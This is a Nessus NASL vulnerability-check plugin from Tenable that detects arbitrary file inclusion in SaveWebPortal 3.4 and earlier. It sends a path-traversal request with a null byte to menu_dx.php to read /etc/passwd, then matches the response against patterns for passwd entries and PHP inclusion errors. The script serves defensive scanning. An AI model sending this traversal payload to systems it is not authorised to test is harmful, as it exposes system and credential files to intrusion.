#
# (C) Tenable Network Security
#


if (description) {
  script_id(19604);
  script_version("$Revision: 1.3 $");

  script_bugtraq_id(14639, 14641, 14642, 14643);

  name["english"] = "SaveWebPortal <= 3.4 Multiple Vulnerabilities";
  script_name(english:name["english"]);

  desc["english"] = "
The remote host is running SaveWebPortal, a PHP web portal application.

The installed version of SaveWebPortal is prone to multiple
vulnerabilities, including remote code execution, arbitrary file
inclusion, and cross-site scripting.

See also : http://retrogod.altervista.org/save_yourself_from_savewebportal34.html
Solution : Unknown at this time.
Risk factor : High";
  script_description(english:desc["english"]);

  summary["english"] = "Checks for SaveWebportal arbitrary file inclusion";
  script_summary(english:summary["english"]);

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2005 Tenable Network Security");

  script_dependencie("http_version.nasl");
  script_require_ports("Services/www", 80);
 script_exclude_keys("Settings/disable_cgi_scanning");

  exit(0);
}


include("http_func.inc");
include("http_keepalive.inc");


port = get_http_port(default:80);
if (!get_port_state(port)) exit(0);
if (!can_host_php(port:port)) exit(0);


 # Loop through CGI directories.
foreach dir (cgi_dirs()) {
  # Try to exploit one of the flaws to read /etc/passwd.
  req = http_get(
    item:string(
      dir, "/menu_dx.php?",
      "SITE_Path=../../../../../../../../../../etc/passwd%00"
    ),
    port:port
  );
  res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
  if (res == NULL) exit(0);

  # There's a problem if...
  if (
    # there's an entry for root or...
    egrep(string:res, pattern:"root:.*:0:[01]:") ||
    # we get an error saying "failed to open stream" or "Failed opening".
    #
    # nb: this suggests magic_quotes_gpc was enabled but passing
    #     remote URLs might still work.
    egrep(string:res, pattern:"Warning.*: *main\(/etc/passwd.+failed to open stream") ||
    egrep(string:res, pattern:"Warning.*: .+ Failed opening '/etc/passwd.+for inclusion")
  ) {
    security_hole(port);
    exit(0);
  }
}
